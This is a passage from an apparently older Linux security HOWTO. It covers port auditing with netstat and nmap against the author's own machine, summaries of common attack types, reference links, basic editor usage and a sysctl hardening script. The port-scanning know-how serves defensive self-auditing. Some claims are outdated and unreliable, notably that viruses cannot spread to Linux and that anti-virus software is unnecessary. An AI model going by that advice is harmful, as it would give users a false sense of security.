| # ls -l /proc/1315/exe                                                      |
| lrwxrwxrwx  1 root  root   0 July 4 19:41 /proc/1315/exe -> /usr/sbin/cupsd |
|                                                                             |
|                                                                             |
+-----------------------------------------------------------------------------+

Finally, we had a loose end or two in the UDP listening services. Remember we
had a strange looking port number 32768, that also had no service name
associated with it:

+------------------------------------------------------------------------------------+
| # netstat -aup                                                                     |
| Active Internet connections (servers and established)                              |
|  Local Address           Foreign Address         State       PID/Program name      |
|   *:32768                 *:*                                 956/named            |
|   bigcat:domain           *:*                                 956/named            |
|   bigcat:domain           *:*                                 956/named            |
|   *:631                   *:*                                 1315/cupsd           |
|                                                                                    |
|                                                                                    |
+------------------------------------------------------------------------------------+

Now by including the "PID/Program name" option with the -p flag, we see this
also belongs to named, the nameserver daemon. Recent versions of BIND use an
unprivileged port for some types of traffic. In this case, this is BIND 9.x.
So no real alarms here either. The unprivileged port here is the one named
uses to to talk to other nameservers for name and address lookups, and should
not be firewalled.

So we found no big surprises in this hypothetical situation.

If all else fails, and you can't find a process owner for an open port,
suspect that it may be an RPC (Remote Procedure Call) service of some kind.
These use randomly assigned ports without any seeming logic or consistency,
and are typically controlled by the portmap daemon. In some cases, these may
not reveal the process owner to netstat or lsof. Try stopping portmap, and
then see if the mystery service goes away. Or you can use rpcinfo -p
localhost to see what RPC services may be running (portmap must be running
for this to work).

Warning If you suspect you have been broken into, do not trust netstat or ps
        output. There is a good chance that they, and other system
        components, has been tampered with in such a way that the output is
        not reliable.
-----------------------------------------------------------------------------

8.4. Attacks and Threats

In this section, we will take a quick look at some of the common threats and
techniques that are out there, and attempt to put them into some perspective.

The corporate world, government agencies and high profile Internet sites have
to be concerned with a much more diverse and challenging set of threats than
the typical home desktop user. There are many reasons someone may want to
break in to someone else's computer. It may be just for kicks, or any number
of malicious reasons. They may just want a base from which to attack someone
else. This is a very common motivation.

The most common "attack" for most of us is from already compromised systems.
The Internet is littered with computers that have been broken into, and are
now doing their master's bidding blindly, in zombie-like fashion. They are
programmed to scan massively large address ranges, probing each individual IP
address as they go. Looking for one or more open ports, and then probing for
known weaknesses if they get the chance. Very impersonal. Very methodical.
And very effective. We are all in the path of such robotic scans. All because
those responsible for these systems fail to do what you are doing now -
taking steps to protect their system(s), and avoid being r00ted.

These scans do not look at login banners that may be presented on connection.
It will do little good to change your /etc/issue.net to pretend that you are
running some obscure operating system. If they find something listening, they
will try all of the exploits appropriate to that port, without regard to any
indications your system may give. If it works, they are in -- if not, they
will move on.
-----------------------------------------------------------------------------

8.4.1. Port Scans and Probes

First, let's define "scan" and "probe" since these terms come up quite a bit.
A "probe" implies testing if a given port is open or closed, and possibly
what might be listening on that port. A "scan" implies either "probing"
multiple ports on one or more systems. Or individual ports on multiple
systems. So you might "scan" all ports on your own system for instance. Or a
cracker might "scan" the 216.78.*.* address range to see who has port 111
open.

Black hats can use scan and probe information to know what services are
running on a given system, and then they might know what exploits to try.
They may even be able to tell what Operating System is running, and even
kernel version, and thus get even more information. "Worms", on the other
hand, are automated and scan blindly, generally just looking for open ports,
and then a susceptible victim. They are not trying to "learn" anything, the
way a cracker might.

The distinction between "scan" and "probe"is often blurred. Both can used in
good ways, or in bad ways, depending on who is doing it, and why. You might
ask a friend to scan you, for instance, to see how well your firewall is
working. This is a legitimate use of scanning tools such as nmap. But what if
someone you don't know does this? What is their intent? If it's your ISP,
they may be trying to enforce their Terms of Service Agreement. Or maybe, it
is someone just playing, and seeing who is "out there". But more than likely
it is someone or something with not such good intentions.

Full range port scans (meaning probing of many ports on the same machine)
seem to be a not so common threat for home based networks. But certainly,
scanning individual ports across numerous systems is a very, very common
occurrence.
-----------------------------------------------------------------------------

8.4.2. Rootkits

A "rootkit" is the script kiddie's stock in trade. When a successful
intrusion takes place, the first thing that is often done, is to download and
install such "rootkits". The rootkit is a set of scripts designed to take
control of the system, and then hide the intrusion. Rootkits are readily
available on the web for various Operating Systems.

A rootkit will typically replace critical system files such as ls, ps,
netstat, login and others. Passwords may be added, hidden daemons started,
logs tampered with, and surely one of more backdoors are opened. The hidden
backdoors allow easy access any time the attacker wants back in. And often
the vulnerability itself may even be fixed so that the new "owner" has the
system all to himself. The entire process is scripted so it happens very
quickly. The rightful owners of these compromised systems generally have no
idea what is going on, and are victims themselves. A well designed rootkit
can be very difficult to detect.
-----------------------------------------------------------------------------

8.4.3. Worms and Zombies

A "worm" is a self replicating exploit. It infects a system, then attempts to
spread itself typically via the same vulnerability. Various "worms" are
weaving their way through the entire Internet address space constantly,
spreading themselves as they go.

But somewhere behind the zombie, there is a controller. Someone launched the
worm, and they will be informed after a successful intrusion. It is then up
to them how the system will be used.

Many of these are Linux systems, looking for other Linux systems to "infect"
via a number of exploits. But most Operating Systems share in this threat.
Once a vulnerable system is found, the actual entry and take over is quick,
and may be difficult to detect after the fact. The first thing an intruder
(whether human or "worm") will do is attempt to cover their tracks. A
"rootkit" is downloaded and installed. This trend has been exacerbated by the
growing popularity of cable modems and DSL. The number of full time Internet
connections is growing rapidly, and this makes fertile ground for such
exploits since often these aren't as well secured as larger sites.

While this may sound ominous, a few simple precautions can effectively deter
this type of attack. With so many easy victims out there, why waste much
effort breaking into your system? There is no incentive to really try very
hard. Just scan, look, try, move on if unsuccessful. There is always more IPs
to be scanned. If your firewall is effectively bouncing this kind of thing,
it is no threat to you at all. Take comfort in that, and don't over re-act.

It is worth noting, that these worms cannot "force" their way in. They need
an open and accessible port, and a known vulnerability. If you remember the
"Iptables Weekly Log Summary" in the opening section above, many of those may
have all been the result of this type of scan. If you've followed the steps
in this HOWTO, you should be reasonably safe here. This one is easy enough to
deflect.
-----------------------------------------------------------------------------

8.4.4. Script Kiddies

A "script kiddie" is a "cracker" wanna be who doesn't know enough to come up
with his/her own exploits, but instead relies on "scripts" and exploits that
have been developed by others. Like "worms", they are looking for easy
victims, and may similarly scan large address ranges looking for specific
ports with known vulnerabilities. Often, the actual scanning is done from
already comprised systems so that it is difficult to trace it back to them.

The script kiddie has a bag of ready made tricks at his disposal, including
an arsenal of "rootkits" for various Operating Systems. Finding susceptible
victims is not so hard, given enough time and address space to probe. The
motives are a mixed bag as well. Simple mischief, defacement of web sites,
stolen credit card numbers, and the latest craze, "Denial of Service" attacks
(see below). They collect zombies like trophies and use them to carry out
whatever their objective is.

Again, the key here is that they are following a "script", and looking for
easy prey. Like the worm threat above, a functional firewall and a few very
basic precautions, should be sufficient to deflect any threat here. By now,
you should be relatively safe from this nuisance.
-----------------------------------------------------------------------------

8.4.5. Spoofed IPs

How easy is it to spoof an IP address? With the right tools, very easy. How
much of a threat is this? Not much, for most of us, and is over-hyped as a
threat.

Because of the way TCP/IP works, each packet must carry both the source and
destination IP addresses. Any return traffic is based on this information. So
a spoofed IP can never return any useful information to an attacker who is
sending out spoofed packets. The traffic would go back to wherever that
spoofed IP address was pointed. The attacker gets nothing back at all.

This does have potential for "DoS" attacks (see below) where learning
something about the targeted system is not important. And may be used for
some general mischief making as well.
-----------------------------------------------------------------------------

8.4.6. Targeted Attacks

The worm and wide ranging address type scans, are impersonal. They are just
looking for any vulnerable system. It makes no difference whether it is a top
secret government facility, or your mother's Window's box. But there are
"black hats" that will spend a great deal of effort to get into a system or
network. We'll call these "targeted" attacks since there has been a
deliberate decision made to break in to a specific system or network.

In this case, the attacker will look the system over for weaknesses. And
possibly make many different kinds of attempts, until he finds a crack to
wiggle through. Or gives up. This is more difficult to defend against. The
attacker is armed and dangerous, so to speak, and is stalking his prey.

Again, this scenario is very unlikely for a typical home system. There just
generally isn't any incentive to take the time and effort when there are
bigger fish to fry. For those who may be targets, the best defense here
includes many of things we've discussed. Vigilance is probably more important
than ever. Good logging practices and an IDS (Intrusion Detection System)
should be in place. And subscribing to one or more security related mailing
lists like BUGTRAQ. And of course, reading those alerts daily, and taking the
appropriate actions, etc.
-----------------------------------------------------------------------------

8.4.7. Denial of Service (DoS)

"DoS" is another type of "attack" in which the intention is to disrupt or
overwhelm the targeted system or network in such a way that it cannot
function normally. DoS can take many forms. On the Internet, this often means
overwhelming the victim's bandwidth or TCP/IP stack, by sending floods of
packets and thus effectively disabling the connection. We are talking about
many, many packets per second. Thousands in some cases. Or perhaps, the
objective is to crash a server.

This is much more likely to be targeted at organizations or high profile
sites, than home users. And can be quite challenging to stop depending on the
technique. And it generally requires the co-operation of networks between the
source(s) and the target, so that the floods are stopped, or minimized,
before they reach the targeted destination. Once they hit the destination,
there is no good way to completely ignore them.

"DDoS", Distributed Denial of Service, is where multiple sources are used to
maximize the impact. Again, not likely to be directly targeted at home users.
These are "slaves" that are "owned" by a cracker, or script kiddie, that are
woken up and are targeted at the victim. There may be many computers involved
in the attack.

If you are home user, and with a dynamic IP address, you might find
disconnecting, then re-connecting to get a new IP, an effective way out if
you are the target. Maybe.
-----------------------------------------------------------------------------

8.4.8. Brute Force

"Brute force" attacks are where the attacker makes repetitive attempts at the
same perceived weakness(es). Like a battering ram. A classic example would be
where someone tries to access a telnet server simply by continually throwing
passwords at it, hoping that one will eventually work. Or maybe crash the
server. This doesn't require much imagination, and is not a commonly used
tactic against home systems.

By the way, this is one good argument against allowing remote root logins.
The root account exists on all systems. It is probably the only one that this
is true of. You'd like to make a potential attacker guess both the login name
and password. But if root is allowed remote logins, then the attacker only
needs to guess the password!
-----------------------------------------------------------------------------

8.4.9. Viruses

And now something not to worry about. Viruses seem to be primarily a
Microsoft problem. For various reasons, viruses are not a significant threat
to Linux users. This is not to say that it will always be this way, but the
current virus explosion that plagues Microsoft systems, can not spread to
Linux (or Unix) based systems. In fact, the various methods and practices
that enable this phenomena, are not exploitable on Linux. So Anti-Virus
software is not recommended as part of our arsenal. At least for the time
being with Linux only networks.
-----------------------------------------------------------------------------

8.5. Links

Some references for further reading are listed below. Not listed is your
distribution's site, security page or ftp download site. You will have to
find these on your own. Then you should bookmark them!

<A0><A0>*<2A>Other relevant documents available from the Linux Documentation Project:

    Security HOWTO: [http://tldp.org/HOWTO/Security-HOWTO.html ] http://
    tldp.org/HOWTO/Security-HOWTO.html

    Firewall HOWTO: [http://tldp.org/HOWTO/Firewall-HOWTO.html] http://
    tldp.org/HOWTO/Firewall-HOWTO.html

    Ipchains HOWTO: [http://tldp.org/HOWTO/IPCHAINS-HOWTO.html ] http://
    tldp.org/HOWTO/IPCHAINS-HOWTO.html

    User Authentication: [http://tldp.org/HOWTO/User-Authentication-HOWTO/
    index.html] http://tldp.org/HOWTO/User-Authentication-HOWTO/index.html,
    includes a nice discussion on PAM.

    VPN (Virtual Private Network): [http://tldp.org/HOWTO/VPN-HOWTO.html]
    http://tldp.org/HOWTO/VPN-HOWTO.html and [http://tldp.org/HOWTO/
    VPN-Masquerade-HOWTO.html] http://tldp.org/HOWTO/
    VPN-Masquerade-HOWTO.html

    The Remote X Apps Mini HOWTO, [http://www.tldp.org/HOWTO/mini/
    Remote-X-Apps.html] http://www.tldp.org/HOWTO/mini/Remote-X-Apps.html,
    includes excellent discussions on the security implications of running X
    Windows.

    The Linux Network Administrators Guide: [http://tldp.org/LDP/nag2/
    index.html] http://tldp.org/LDP/nag2/index.html, includes a good overview
    of networking and TCP/IP, and firewalling.

    The Linux Administrator's Security Guide: [http://www.seifried.org/lasg/]
    http://www.seifried.org/lasg/, includes many obvious topics of interest,
    including firewalling, passwords and authentication, PAM, and more.

    Securing Red Hat: [http://tldp.org/LDP/solrhe/
    Securing-Optimizing-Linux-RH-Edition-v1.3/index.html] http://tldp.org/LDP
    /solrhe/Securing-Optimizing-Linux-RH-Edition-v1.3/index.html


<A0><A0>*<2A>Tools for creating custom ipchains and iptables firewall scripts:

    Firestarter: [http://firestarter.sourceforge.net] http://
    firestarter.sourceforge.net

    Two related projects: [http://seawall.sourceforge.net/] http://
    seawall.sourceforge.net/ for ipchains, and [http://
    shorewall.sourceforge.net/] http://shorewall.sourceforge.net/ for
    iptables.


<A0><A0>*<2A>Netfilter and iptables documentation from the netfilter developers
    (available in many other languages as well):

    FAQ: [http://netfilter.samba.org/documentation/FAQ/netfilter-faq.html]
    http://netfilter.samba.org/documentation/FAQ/netfilter-faq.html
    Packet filtering: [http://netfilter.samba.org/documentation/HOWTO/
    packet-filtering-HOWTO.html] http://netfilter.samba.org/documentation/
    HOWTO/packet-filtering-HOWTO.html
    Networking: [http://netfilter.samba.org/documentation/HOWTO/
    networking-concepts-HOWTO.html] http://netfilter.samba.org/documentation/
    HOWTO/networking-concepts-HOWTO.html
    NAT/masquerading: [http://netfilter.samba.org/documentation/HOWTO/
    NAT-HOWTO.html] http://netfilter.samba.org/documentation/HOWTO/
    NAT-HOWTO.html


<A0><A0>*<2A>Port number assignments, and what that scanner may be scanning for:

    [http://www.linuxsecurity.com/resource_files/firewalls/
    firewall-seen.html] http://www.linuxsecurity.com/resource_files/firewalls
    /firewall-seen.html

    [http://www.sans.org/newlook/resources/IDFAQ/oddports.htm] http://
    www.sans.org/newlook/resources/IDFAQ/oddports.htm

    [http://www.iana.org/assignments/port-numbers] http://www.iana.org/
    assignments/port-numbers, the official assignments.


<A0><A0>*<2A>General security sites. These all have areas on documentation, alerts,
    newsletters, mailing lists, and other resources.

    Linux Security.com: [http://www.linuxsecurity.com] http://
    www.linuxsecurity.com, loaded with good info, and Linux specific. Lots of
    good docs: [http://www.linuxsecurity.com/docs/] http://
    www.linuxsecurity.com/docs/

    CERT, [http://www.cert.org] http://www.cert.org

    The SANS Institute: [http://www.sans.org/] http://www.sans.org/

    The Coroner's Toolkit (TCT): [http://www.fish.com/security/] http://
    www.fish.com/security/, discussions and tools for dealing with post
    break-in issues (and preventing them in the first place).


<A0><A0>*<2A>Privacy:

    Junkbuster: [http://www.junkbuster.com] http://www.junkbuster.com, a web
    proxy and cookie manager.

    PGP: [http://www.gnupg.org/] http://www.gnupg.org/


<A0><A0>*<2A>Other documentation and reference sites:

    Linux Security.com: [http://www.linuxsecurity.com/docs/] http://
    www.linuxsecurity.com/docs/

    Linux Newbie: [http://www.linuxnewbie.org/nhf/intel/security/index.html]
    http://www.linuxnewbie.org/nhf/intel/security/index.html

    The comp.os.linux.security FAQ: [http://www.linuxsecurity.com/docs/
    colsfaq.html] http://www.linuxsecurity.com/docs/colsfaq.html

    The Internet Firewall FAQ: [http://www.interhack.net/pubs/fwfaq/] http://
    www.interhack.net/pubs/fwfaq/

    The Site Security Handbook RFC: [http://www.ietf.org/rfc/rfc2196.txt]
    http://www.ietf.org/rfc/rfc2196.txt


<A0><A0>*<2A>Miscellaneous sites of interest:

    [http://www.bastille-linux.org] http://www.bastille-linux.org, for
    Mandrake and Red Hat only.

    SAINT: [http://www.wwdsi.com/saint/] http://www.wwdsi.com/saint/, system
    security analysis.

    SSL: [http://www.openssl.org/] http://www.openssl.org/

    SSH: [http://www.openssh.org/] http://www.openssh.org/

    Scan yourself: [http://www.hackerwhacker.com] http://
    www.hackerwhacker.com

    PAM: [http://www.kernel.org/pub/linux/libs/pam/index.html] http://
    www.kernel.org/pub/linux/libs/pam/index.html

    Detecting Trojaned Linux Kernel Modules: [http://members.prestige.net/
    tmiller12/papers/lkm.htm] http://members.prestige.net/tmiller12/papers/
    lkm.htm

    Rootkit checker: [http://www.chkrootkit.org] http://www.chkrootkit.org

    Port scanning tool nmap's home page: [http://www.insecure.org] http://
    www.insecure.org

    Nessus, more than just a port scanner: [http://www.nessus.org] http://
    www.nessus.org

    Tripwire, intrusion detection: [http://www.tripwire.org] http://
    www.tripwire.org

    Snort, sniffer and more: [http://www.snort.org] http://www.snort.org

    [http://www.mynetwatchman.com] http://www.mynetwatchman.com and [http://
    dshield.org] http://dshield.org are "Distributed Intrusion Detection
    Systems". They collect log data from subscribing "agents", and collate
    the data to find and report malicious activity. If you want to fight
    back, check these out.


-----------------------------------------------------------------------------
8.6. Editing Text Files

By Bill Staehle

All the world is a file.

There are a great many types of files, but I'm going to stretch it here, and
class them into two really broad families:


<A0>Text<A0>files<A0>are<A0>just<A0>that.
<A0>Binary<A0>files<A0>are<A0>not.

<A0><A0><A0><A0>

Binary files are meant to be read by machines, text files can be easily
edited, and are generally read by people. But text files can be (and
frequently are) read by machines. Examples of this would be configuration
files, and scripts.

There are a number of different text editors available in *nix. A few are
found on every system. That would be '/bin/ed' and '/bin/vi'. 'vi' is almost
always a clone such as 'vim' due to license problems. The problem with 'vi'
and 'ed' is that they are terribly user unfriendly. Another common editor
that is not always installed by default is 'emacs'. It has a lot more
features and capability, and is not easy to learn either.

As to 'user friendly' editors, 'mcedit' and 'pico' are good choices to start
with. These are often much easier for those new to *nix.

The first things to learn are how to exit an editing session, how to save
changes to the file, and then how to avoid breaking long lines that should
not be broken (wrapped).

The 'vi' editor

'vi' is one of the most common text editors in the Unix world, and it's
nearly always found on any *nix system. Actually, due to license problems,
the '/bin/vi' on a Linux system is always a 'clone', such as 'elvis', 'nvi',
or 'vim' (there are others). These clones can act exactly like the original
'vi', but usually have additional features that make it slightly less
impossible to use.

So, if it's so terrible, why learn about it? Two reasons. First, as noted,
it's almost guaranteed to be installed, and other (more user friendly)
editors may not be installed by default. Second, many of the 'commands' work
in other applications (such as the pager 'less' which is also used to view
man pages). In 'less', accidentally pressing the 'v' key starts 'vi' in most
installations.

'vi' has two modes. The first is 'command mode', and keystrokes are
interpreted as commands. The other mode is 'insert' mode, where nearly all
keystrokes are interpreted as text to be inserted.

==> Emergency exit from 'vi' 1. press the <esc> key up to three times, until
the computer beeps, or the screen flashes. 2. press the keys :q! <Enter>

That is: colon, the letter Q, and then the exclamation point, followed by the
Enter key.

'vi' commands are as follows. All of these are in 'command' mode:


a<A0><A0><A0><A0>Enter<A0>insertion<A0>mode<A0>after<A0>the<A0>cursor.
A<A0><A0><A0><A0>Enter<A0>insertion<A0>mode<A0>at<A0>the<A0>end<A0>of<A0>the<A0>current<A0>line.
i<A0><A0><A0><A0>Enter<A0>insertion<A0>mode<A0>before<A0>the<A0>cursor.
o<A0><A0><A0><A0>Enter<A0>insertion<A0>mode<A0>opening<A0>a<A0>new<A0>line<A0>BELOW<A0>current<A0>line.
O<A0><A0><A0><A0>Enter<A0>insertion<A0>mode<A0>opening<A0>a<A0>new<A0>line<A0>ABOVE<A0>current<A0>line.
h<A0><A0><A0><A0>move<A0>cursor<A0>left<A0>one<A0>character.
l<A0><A0><A0><A0>move<A0>cursor<A0>right<A0>one<A0>character.
j<A0><A0><A0><A0>move<A0>cursor<A0>down<A0>one<A0>line.
k<A0><A0><A0><A0>move<A0>cursor<A0>up<A0>one<A0>line.
/mumble<6C><65>move<76>cursor<6F>forward<72>to<74>next<78>occurrence<63>of<6F>'mumble'<27>in<69>
<A0><A0><A0><A0><A0><A0><A0><A0><A0>the<A0>text
?mumble<6C><65>move<76>cursor<6F>backward<72>to<74>next<78>occurrence<63>of<6F>'mumble'<27>
<A0><A0><A0><A0><A0><A0><A0><A0><A0>in<A0>the<A0>text
n<A0><A0><A0><A0>repeat<A0>last<A0>search<A0>(?<3F>or<6F>/<2F>without<75>'mumble'<27>to<74>search<63>for<6F>
<A0><A0><A0><A0><A0>will<A0>do<A0>the<A0>same<A0>thing)
u<A0><A0><A0><A0>undo<A0>last<A0>change<A0>made

^B<><42><A0>Scroll<6C>back<63>one<6E>window.
^F<><46><A0>Scroll<6C>forward<72>one<6E>window.
^U<><55><A0>Scroll<6C>up<75>one<6E>half<6C>window.
^D<><44><A0>Scroll<6C>down<77>one<6E>half<6C>window.

:w<><77><A0>Write<74>to<74>file.
:wq<77><71>Write<74>to<74>file,<2C>and<6E>quit.
:q<><71><A0>quit.
:q!<21><>Quit<69>without<75>saving.

<esc><3E><><A0>Leave<76>insertion<6F>mode.
<A0><A0>
<A0><A0><A0><A0>

NOTE: The four 'arrow' keys almost always work in 'command' or 'insert' mode.

The 'ed' editor.

The 'ed' editor is a line editor. Other than the fact that it is virtually
guaranteed to be on any *nix computer, it has no socially redeeming features,
although some applications may need it. A _lot_ of things have been offered
to replace this 'thing' from 1975.

==> Emergency exit from 'ed'

1. type a period on a line by itself, and press <Enter> This gets you to the
command mode or prints a line of text if you were in command mode. 2. type q
and press <Enter>. If there were no changes to the file, this action quits
ed. If you then see a '?' this means that the file had changed, and 'ed' is
asking if you want to save the changes. Press q and <Enter> a second time to
confirm that you want out.

The 'pico' editor.

'pico' is a part of the Pine mail/news package from the University of
Washington (state, USA). It is a very friendly editor, with one minor
failing. It silently inserts a line feed character and wraps the line when it
exceeds (generally) 74 characters. While this is fine while creating mail,
news articles, and text notes, it is often fatal when editing system files.
The solution to this problem is simple. Call the program with the -w option,
like this:

pico -w file_2_edit

Pico is so user friendly, no further instructions are needed. It _should_ be
obvious (look at the bottom of the screen for commands). There is an
extensive help function. Pico is available with nearly all distributions,
although it _may_ not be installed by default.

==> Emergency exit from 'pico'

Press and hold the <Ctrl> key, and press the letter x. If no changes had been
made to the file, this will quit pico. If changes had been made, it will ask
if you want to save the changes. Pressing n will then exit.

The 'mcedit' editor.

'mcedit' is part of the Midnight Commander shell program, a full featured
visual shell for Unix-like systems. It can be accessed directly from the
command line ( mcedit file_2_edit ) or as part of 'mc' (use the arrow keys to
highlight the file to be edited, then press the F4 key).

mcedit is probably the most intuitive editor available, and comes with
extensive help. "commands" are accessed through the F* keys. Midnight
Commander is available with nearly all distributions, although it _may_ not
be installed by default.

==> Emergency exit from 'mcedit'

Press the F10 key. If no changes have been made to the file, this will quit
mcedit. If changes had been made, it will ask if you want to Cancel this
action. Pressing n will then exit.
-----------------------------------------------------------------------------

8.7. nmap

Let's look at a few quick examples of what nmap scans look like. The intent
here is to show how to use nmap to verify our firewalling, and system
integrity. nmap has other uses that we don't need to get into. Do NOT use
nmap on systems other than your own, unless you have permission from the
owner, and you know it is not a violation of anyone's Terms of Service. This
kind of thing will be taken as hostile by most people.

As mentioned previously, nmap is a sophisticated port scanning tool. It tries
to see if a host is "there", and what ports might be open. Barring that, what
states those ports might be in. nmap has a complex command line and can do
many types of "scans". See the man page for all the nitty gritty.

A couple of words of warning first. If using portsentry, turn it off. It will
drop the route to wherever the scan is coming from. You might want to turn
off any logging also, or at least be aware that you might get copious logs if
doing multiple scans.

A simple, default scan of "localhost":

+---------------------------------------------------------------------------+
| # nmap localhost                                                          |
|                                                                           |
| Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )   |
| Interesting ports on bigcat (127.0.0.1):                                  |
| (The 1507 ports scanned but not shown below are in state: closed)         |
|                                                                           |
| Port       State       Service                                            |
| 22/tcp     open        ssh                                                |
| 25/tcp     open        smtp                                               |
| 37/tcp     open        time                                               |
| 53/tcp     open        domain                                             |
| 80/tcp     open        http                                               |
| 3000/tcp   open        ppp                                                |
|                                                                           |
| Nmap run completed -- 1 IP address (1 host up) scanned in 2 seconds       |
|                                                                           |
|                                                                           |
+---------------------------------------------------------------------------+

If you've read most of this document, you should be familiar with these
services by now. These are some of the same ports we've seen in other
examples. Some things to note on this scan: it only did 1500+ "interesting"
ports -- not all ports. This can be configured differently if more is
desirable (see man page). It only did TCP ports too. Again, configurable. It
only picks up "listening" services, unlike netstat that shows all open ports
-- listening or otherwise. Note the last "open" port here is 3000 is
identified as "PPP". Wrong! That is just an educated guess by nmap based on
what is contained in /etc/services for this port number. Actually in this
case it is ntop (a network traffic monitor). Take the service names with a
grain of salt. There is no way for nmap to really know what is on that port.
Matching port numbers with service names can at times be risky. Many do have
standard ports, but there is nothing to say they have to use the commonly
associated port numbers.

Notice that in all our netstat examples, we had two classes of open ports:
listening servers, and then established connections that we initiated to
other remote hosts (e.g. a web server somewhere). nmap only sees the first
group -- the listening servers! The other ports connecting us to remote
servers are not visible, and thus not vulnerable. These ports are "private"
to that single connection, and will be closed when the connection is
terminated.

So we have open and closed ports here. Simple enough, and gives a pretty good
idea what is running on bigcat -- but not necessarily what we look like to
the outside world since this was done from localhost, and wouldn't reflect
any firewalling or other access control mechanisms.

Let's do a little more intensive scan. Let's check all ports -- TCP and UDP.

+---------------------------------------------------------------------------+
| # nmap -sT -sU -p 1-65535 localhost                                       |
|                                                                           |
| Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )   |
| Interesting ports on bigcat (127.0.0.1):                                  |
| (The 131050 ports scanned but not shown below are in state: closed)       |
|                                                                           |
| Port       State       Service                                            |
| 22/tcp     open        ssh                                                |
| 25/tcp     open        smtp                                               |
| 37/tcp     open        time                                               |
| 53/tcp     open        domain                                             |
| 53/udp     open        domain                                             |
| 80/tcp     open        http                                               |
| 3000/tcp   open        ppp                                                |
| 8000/tcp   open        unknown                                            |
| 32768/udp  open        unknown                                            |
|                                                                           |
| Nmap run completed -- 1 IP address (1 host up) scanned in 385 seconds     |
|                                                                           |
|                                                                           |
+---------------------------------------------------------------------------+

This is more than just "interesting" ports -- it is everything. We picked up
a couple of new ones in the process too. We've seen these before with netstat
, so we know what they are. That is the Junkbuster web proxy on port 8000/tcp
and named on 32768/udp. This scan takes much, much longer, but it is the only
way to see all ports.

So now we have a pretty good idea of what is open on bigcat. Since we are
scanning localhost from localhost, everything should be visible. We still
don't know how the outside world sees us though. Now I'll ssh to another host
on the same LAN, and try again.

+---------------------------------------------------------------------------+
| # nmap bigcat                                                             |
|                                                                           |
| Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )   |
| Interesting ports on bigcat (192.168.1.1):                                |
| (The 1520 ports scanned but not shown below are in state: closed)         |
|                                                                           |
| Port       State       Service                                            |
| 22/tcp     open        ssh                                                |
| 3000/tcp   open        ppp                                                |
|                                                                           |
| Nmap run completed -- 1 IP address (1 host up) scanned in 1 second        |
|                                                                           |
|                                                                           |
+---------------------------------------------------------------------------+

I confess to tampering with the iptables rules here to make a point. Only two
visible ports on this scan. Everything else is "closed". So says nmap. Once
again:

+----------------------------------------------------------------------------------+
| # nmap bigcat                                                                    |
|                                                                                  |
| Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )          |
| Note: Host seems down. If it is really up, but blocking our ping probes, try -P0 |
|                                                                                  |
| Nmap run completed -- 1 IP address (0 hosts up) scanned in 30 seconds            |
|                                                                                  |
|                                                                                  |
+----------------------------------------------------------------------------------+

Oops, I blocked ICMP (ping) while I was at it this time. One more time:

+---------------------------------------------------------------------------+
| # nmap -P0 bigcat                                                         |
|                                                                           |
| Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )   |
| All 1523 scanned ports on bigcat (192.168.1.1) are: filtered              |
|                                                                           |
| Nmap run completed -- 1 IP address (1 host up) scanned in 1643 seconds    |
|                                                                           |
|                                                                           |
+---------------------------------------------------------------------------+

That's it. Notice how long that took. Notice ports are now "filtered" instead
of "closed". How does nmap know that? Well for one, "closed" means bigcat
sent a packet back saying "nothing running here", i.e. port is closed. In
this last example, the iptables rules were changed to not allow ICMP (ping),
and to "DROP" all incoming packets. In other words, no response at all. A
subtle difference since nmap seems to still know there was a host there, even
though no response was given. One lesson here, is if you want to slow a
scanner down, "DROP" (or "DENY") the packets. This forces a TCP time out for
the remote end on each port probe. Anyway, if your scans look like this, that
is probably as well as can be expected, and your firewall is doing its job.

A brief note on UDP: nmap can not accurately determine the status of these
ports if they are "filtered". You probably will get a false-positive "open"
condition. This has to do with UDP being a connectionless protocol. If nmap
gets no answer (e.g. due to a "DROP"), it assumes the packets reached the
target, and thus the port will be reported as "open". This is "normal" for
nmap.

We can play with firewall rules in a LAN set up to try to simulate how the
outside world sees us, and if we are smart, and know what we are doing, and
don't have a brain fart, we probably will have a pretty good picture. But it
is still best to try to find a way to do it from outside if possible. Again,
make sure you are not violating any ISP rules of conduct. Do you have a
friend on the same ISP?
-----------------------------------------------------------------------------

8.8. Sysctl Options

The "sysctl" options are kernel parameters that can be configured via the /
proc filesystem. These can be dynamically adjusted at run-time. Typically
these options are off if set to "0", and on if set to "1".

Some of these have security implications, and thus is why we are here ;-)
We'll just list the ones we think are relevant. Feel free to cut and paste
these into a firewall script, or other file that is run during boot (like /
etc/rc.local). Or your distribution may have their own way of tuning this.
You can read up on what these mean in /usr/src/linux/Documentation/sysctl/
README and other files in the kernel Documentation directories.

#!/bin/sh
#
# Configure kernel sysctl run-time options.
#
###################################################################

# Anti-spoofing blocks
for i in /proc/sys/net/ipv4/conf/*/rp_filter;
do
 echo 1 > $i
done

# Ensure source routing is OFF
for i in /proc/sys/net/ipv4/conf/*/accept_source_route;
 do
  echo 0 > $i
 done

# Ensure TCP SYN cookies protection is enabled
[ -e /proc/sys/net/ipv4/tcp_syncookies ] &&\
 echo 1 > /proc/sys/net/ipv4/tcp_syncookies

# Ensure ICMP redirects are disabled
for i in /proc/sys/net/ipv4/conf/*/accept_redirects;
 do
  echo 0 > $i
 done

# Ensure oddball addresses are logged
[ -e /proc/sys/net/ipv4/conf/all/log_martians ] &&\
 echo 1 > /proc/sys/net/ipv4/conf/all/log_martians

[ -e /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts ] &&\
 echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts

[ -e /proc/sys/net/ipv4/icmp_ignore_bogus_error_responses ] &&\
 echo 1 > /proc/sys/net/ipv4/icmp_ignore_bogus_error_responses

## Optional from here on down, depending on your situation. ############

# Ensure ip-forwarding is enabled if
# we want to do forwarding or masquerading.
[ -e /proc/sys/net/ipv4/ip_forward ] &&\
 echo 1 > /proc/sys/net/ipv4/ip_forward

# On if your IP is dynamic (or you don't know).
[ -e /proc/sys/net/ipv4/ip_dynaddr ] &&\
 echo 1 > /proc/sys/net/ipv4/ip_dynaddr

# eof


-----------------------------------------------------------------------------

8.9. Secure Alternatives

This section will give a brief run down on secure alternatives to potentially
insecure methods. This will be a hodge podge of clients and servers.

<A0><A0>*<2A>telnet, rsh - ssh

